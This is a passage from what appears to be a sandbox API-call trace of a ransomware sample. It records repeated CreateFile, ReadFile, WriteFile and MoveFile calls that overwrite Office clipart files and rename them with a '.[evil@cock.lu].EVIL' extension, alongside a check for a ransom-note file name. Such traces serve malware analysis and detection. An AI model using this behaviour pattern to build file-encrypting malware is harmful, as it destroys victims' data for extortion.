_Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00476_.WMF") returned 69 [0169.199] wcscmp (_String1="SO00476_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.199] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00476_.WMF") returned 0x0 [0169.199] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00476_.WMF") returned 0x45 [0169.199] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00476_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00476_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.201] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xfc0, lpOverlapped=0x0) returned 1 [0169.208] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.208] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.208] _errno () returned 0x84b1160840 [0169.208] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.208] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0xfe0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xfe0, lpOverlapped=0x0) returned 1 [0169.209] CloseHandle (hObject=0x1a8) returned 1 [0169.209] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00476_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.209] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.209] __uncaught_exception () returned 0x84b1160800 [0169.209] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.209] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00476_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00476_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00476_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00476_.wmf.[evil@cock.lu].evil")) returned 1 [0169.210] ??_V@YAXPEAX@Z () returned 0x1 [0169.213] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00476_.WMF", dwFileAttributes=0x200) returned 0 [0169.213] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.213] wcsstr (_Str="SO00479_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.213] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00479_.WMF") returned 69 [0169.213] wcscmp (_String1="SO00479_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.213] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00479_.WMF") returned 0x0 [0169.213] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00479_.WMF") returned 0x45 [0169.213] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00479_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00479_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.215] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5b08, lpOverlapped=0x0) returned 1 [0169.236] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.236] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.236] _errno () returned 0x84b1160840 [0169.236] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.236] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x5b20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5b20, lpOverlapped=0x0) returned 1 [0169.236] CloseHandle (hObject=0x1a8) returned 1 [0169.237] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00479_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.237] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.237] __uncaught_exception () returned 0x84b1160800 [0169.237] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.237] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00479_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00479_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00479_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00479_.wmf.[evil@cock.lu].evil")) returned 1 [0169.238] ??_V@YAXPEAX@Z () returned 0x1 [0169.241] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00479_.WMF", dwFileAttributes=0x200) returned 0 [0169.241] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.241] wcsstr (_Str="SO00483_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.241] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00483_.WMF") returned 69 [0169.241] wcscmp (_String1="SO00483_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.241] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00483_.WMF") returned 0x0 [0169.241] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00483_.WMF") returned 0x45 [0169.242] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00483_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00483_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.243] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2bb8, lpOverlapped=0x0) returned 1 [0169.248] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.248] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.248] _errno () returned 0x84b1160840 [0169.248] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.248] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x2bc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2bc0, lpOverlapped=0x0) returned 1 [0169.248] CloseHandle (hObject=0x1a8) returned 1 [0169.248] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00483_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.249] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.249] __uncaught_exception () returned 0x84b1160800 [0169.249] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.249] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00483_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00483_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00483_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00483_.wmf.[evil@cock.lu].evil")) returned 1 [0169.251] ??_V@YAXPEAX@Z () returned 0x1 [0169.253] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00483_.WMF", dwFileAttributes=0x200) returned 0 [0169.254] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.254] wcsstr (_Str="SO00486_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.254] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00486_.WMF") returned 69 [0169.254] wcscmp (_String1="SO00486_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.254] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00486_.WMF") returned 0x0 [0169.254] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00486_.WMF") returned 0x45 [0169.254] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00486_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00486_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.256] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1e58, lpOverlapped=0x0) returned 1 [0169.261] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.261] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.261] _errno () returned 0x84b1160840 [0169.261] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.261] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x1e60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1e60, lpOverlapped=0x0) returned 1 [0169.261] CloseHandle (hObject=0x1a8) returned 1 [0169.261] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00486_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.261] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.261] __uncaught_exception () returned 0x84b1160800 [0169.261] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.262] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00486_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00486_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00486_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00486_.wmf.[evil@cock.lu].evil")) returned 1 [0169.262] ??_V@YAXPEAX@Z () returned 0x1 [0169.265] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00486_.WMF", dwFileAttributes=0x200) returned 0 [0169.265] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.265] wcsstr (_Str="SO00505_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.265] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00505_.WMF") returned 69 [0169.265] wcscmp (_String1="SO00505_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.265] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00505_.WMF") returned 0x0 [0169.265] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00505_.WMF") returned 0x45 [0169.265] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00505_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00505_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.268] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xaa4, lpOverlapped=0x0) returned 1 [0169.274] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.274] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.274] _errno () returned 0x84b1160840 [0169.274] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.274] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0xac0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xac0, lpOverlapped=0x0) returned 1 [0169.274] CloseHandle (hObject=0x1a8) returned 1 [0169.274] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00505_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.274] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.274] __uncaught_exception () returned 0x84b1160800 [0169.274] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.275] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00505_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00505_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00505_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00505_.wmf.[evil@cock.lu].evil")) returned 1 [0169.276] ??_V@YAXPEAX@Z () returned 0x1 [0169.278] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00505_.WMF", dwFileAttributes=0x200) returned 0 [0169.278] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.278] wcsstr (_Str="SO00513_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.278] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00513_.WMF") returned 69 [0169.278] wcscmp (_String1="SO00513_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.278] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00513_.WMF") returned 0x0 [0169.278] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00513_.WMF") returned 0x45 [0169.279] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00513_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00513_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.280] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1724, lpOverlapped=0x0) returned 1 [0169.287] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.287] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.287] _errno () returned 0x84b1160840 [0169.288] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.288] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x1740, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1740, lpOverlapped=0x0) returned 1 [0169.288] CloseHandle (hObject=0x1a8) returned 1 [0169.288] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00513_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.288] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.288] __uncaught_exception () returned 0x84b1160800 [0169.288] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.288] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00513_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00513_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00513_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00513_.wmf.[evil@cock.lu].evil")) returned 1 [0169.289] ??_V@YAXPEAX@Z () returned 0x1 [0169.292] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00513_.WMF", dwFileAttributes=0x200) returned 0 [0169.292] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.292] wcsstr (_Str="SO00555_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.292] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00555_.WMF") returned 69 [0169.292] wcscmp (_String1="SO00555_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.292] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00555_.WMF") returned 0x0 [0169.292] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00555_.WMF") returned 0x45 [0169.292] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00555_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00555_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.294] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2602, lpOverlapped=0x0) returned 1 [0169.307] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.307] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.307] _errno () returned 0x84b1160840 [0169.307] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.307] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x2620, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2620, lpOverlapped=0x0) returned 1 [0169.308] CloseHandle (hObject=0x1a8) returned 1 [0169.308] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00555_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.308] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.308] __uncaught_exception () returned 0x84b1160800 [0169.308] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.308] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00555_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00555_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00555_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00555_.wmf.[evil@cock.lu].evil")) returned 1 [0169.309] ??_V@YAXPEAX@Z () returned 0x1 [0169.312] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00555_.WMF", dwFileAttributes=0x200) returned 0 [0169.312] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.312] wcsstr (_Str="SO00603_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.312] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00603_.WMF") returned 69 [0169.312] wcscmp (_String1="SO00603_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.312] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00603_.WMF") returned 0x0 [0169.312] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00603_.WMF") returned 0x45 [0169.312] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00603_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00603_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.314] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6260, lpOverlapped=0x0) returned 1 [0169.321] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.321] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.321] _errno () returned 0x84b1160840 [0169.321] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.321] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x6280, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6280, lpOverlapped=0x0) returned 1 [0169.322] CloseHandle (hObject=0x1a8) returned 1 [0169.322] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00603_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.322] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.322] __uncaught_exception () returned 0x84b1160800 [0169.322] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.322] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00603_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00603_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00603_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00603_.wmf.[evil@cock.lu].evil")) returned 1 [0169.323] ??_V@YAXPEAX@Z () returned 0x1 [0169.326] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00603_.WMF", dwFileAttributes=0x200) returned 0 [0169.326] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.326] wcsstr (_Str="SO00610_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.326] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00610_.WMF") returned 69 [0169.326] wcscmp (_String1="SO00610_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.326] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00610_.WMF") returned 0x0 [0169.326] 